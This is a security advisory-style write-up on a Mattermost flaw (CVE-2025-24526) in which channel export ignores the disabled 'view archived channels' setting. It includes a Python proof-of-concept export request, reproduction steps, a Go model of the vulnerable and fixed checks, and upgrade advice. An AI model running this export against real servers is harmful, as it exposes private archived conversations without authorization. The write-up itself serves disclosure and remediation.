Mattermost versions 10.1.x <= 10.1.3, 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 fail to enforce the "Allow users to view archived channels" setting in the channel export functionality. When that setting is disabled, users should not be able to view or export the contents of archived channels; on affected versions, an authenticated user can still export an archived channel's contents even though they are not authorized to view it.
Code Snippet
The code snippet below demonstrates how a user can bypass the disabled setting and export the channel contents.
```python
import requests

# Replace these values with your own
mattermost_url = "https://your-mattermost-url.com"
api_key = "your-api-key"              # access token of the calling user
channel_id = "channel-id-to-export"   # ID of an archived channel the user belonged to

# Export path as given in this write-up; verify the exact path against your deployment.
# Mattermost identifies the calling user from the bearer token, so no user ID header is needed.
url = f"{mattermost_url}/api/v4/channels/{channel_id}/posts/export"
headers = {"Authorization": f"Bearer {api_key}", "Accept": "application/json"}

response = requests.get(url, headers=headers, timeout=30)
if response.status_code == 200:
    with open("channel_export.json", "wb") as f:
        f.write(response.content)
    print("Channel export successful")
else:
    # A patched server refuses the export of an archived channel when the setting is disabled.
    print("Error exporting channel:", response.status_code, response.text)
```
This code snippet illustrates that a user can make an API call to the Mattermost server to export channel contents, even when the "Allow users to view archived channels" setting is disabled.
Links to the original sources discussing the vulnerability
1. Mattermost Security Advisory: CVE-2025-24526
2. National Vulnerability Database: CVE-2025-24526
Exploit Details
This exploit takes advantage of the fact that Mattermost does not properly enforce the "Allow users to view archived channels" setting in the export functionality. Here are the steps to reproduce the exploit:
1. Ensure that the "Allow users to view archived channels" setting is disabled in Mattermost (System Console, Teams) and that the target channel is archived.
2. Use the code snippet provided above, replacing the values with your own Mattermost URL, access token, and channel ID.
3. Run the code snippet. If successful, you will see a message saying "Channel export successful" and a channel_export.json file will be created containing the channel contents.
Please note that the user should not have been able to export the channel contents since the "Allow users to view archived channels" setting is disabled. This exploit allows unauthorized access to potentially sensitive information within archived channels.
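The authorization decision the export handler must make, modelled as an added Go example (this is illustrative code written for this page, not Mattermost's own source). The types `Channel`, `TeamSettings` and the functions `canExportVulnerable`, `canExportFixed`, `exportStatus` are assumptions introduced here; the field names `DeleteAt` (non-zero for an archived channel) and `ExperimentalViewArchivedChannels` (the config key behind the System Console setting) follow Mattermost's channel model and config naming. The vulnerable path checks only channel membership; the fixed path also refuses archived channels when the setting is off, while leaving active channels unaffected.

```go
package main

import "fmt"

// Channel models the two fields of a Mattermost channel that matter here.
// Mattermost marks an archived channel with a non-zero DeleteAt timestamp
// (unix milliseconds); 0 means the channel is active.
type Channel struct {
	ID       string
	DeleteAt int64
}

// TeamSettings models the one setting the advisory concerns; in Mattermost's
// config.json it is TeamSettings.ExperimentalViewArchivedChannels.
type TeamSettings struct {
	ExperimentalViewArchivedChannels bool
}

// canExportVulnerable models the flawed authorization this page describes:
// only channel membership is checked, so the export succeeds for an archived
// channel even when viewing archived channels has been disabled.
func canExportVulnerable(_ Channel, isMember bool, _ TeamSettings) bool {
	return isMember
}

// canExportFixed adds the missing check: a member may export an archived
// channel only when the admin has allowed users to view archived channels.
// Active channels (DeleteAt == 0) are not affected by the setting.
func canExportFixed(ch Channel, isMember bool, cfg TeamSettings) bool {
	if !isMember {
		return false
	}
	if ch.DeleteAt != 0 && !cfg.ExperimentalViewArchivedChannels {
		return false
	}
	return true
}

// exportStatus maps the decision to the HTTP status an API handler would
// return: 200 when the export proceeds, 403 when the request is refused.
func exportStatus(allowed bool) int {
	if allowed {
		return 200
	}
	return 403
}

func main() {
	// Constructed sample data: one archived and one active channel.
	archived := Channel{ID: "archived-channel", DeleteAt: 1700000000000}
	active := Channel{ID: "active-channel"}
	settings := []TeamSettings{
		{ExperimentalViewArchivedChannels: false},
		{ExperimentalViewArchivedChannels: true},
	}
	for _, cfg := range settings {
		for _, ch := range []Channel{archived, active} {
			fmt.Printf("viewArchived=%-5v channel=%-16s vulnerable=%d fixed=%d\n",
				cfg.ExperimentalViewArchivedChannels, ch.ID,
				exportStatus(canExportVulnerable(ch, true, cfg)),
				exportStatus(canExportFixed(ch, true, cfg)))
		}
	}
}
```

The only row where the two paths disagree is an archived channel with the setting off: the vulnerable path returns 200 and the fixed path returns 403. That row is exactly the condition the reproduction steps above exercise, and it is the case to re-test after upgrading.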
## Mitigation / Patch Information
To address this vulnerability, Mattermost has released patches for the affected versions. It is recommended to upgrade to the following patched versions immediately:
For 10.2.x users, upgrade to 10.2.3 or later. For the other affected branches (10.4.x, 10.3.x, 10.1.x and 9.11.x), upgrade to the first release after the last affected version listed above, as stated in the Mattermost advisory.
There is no configuration workaround: disabling "Allow users to view archived channels" is precisely the setting that affected versions fail to enforce, so the only way to prevent unauthorized export of archived channel contents is to run a patched version. After upgrading, repeat the steps above against an archived channel and confirm the export is refused.
Timeline
Published on: 02/24/2025 08:15:10 UTC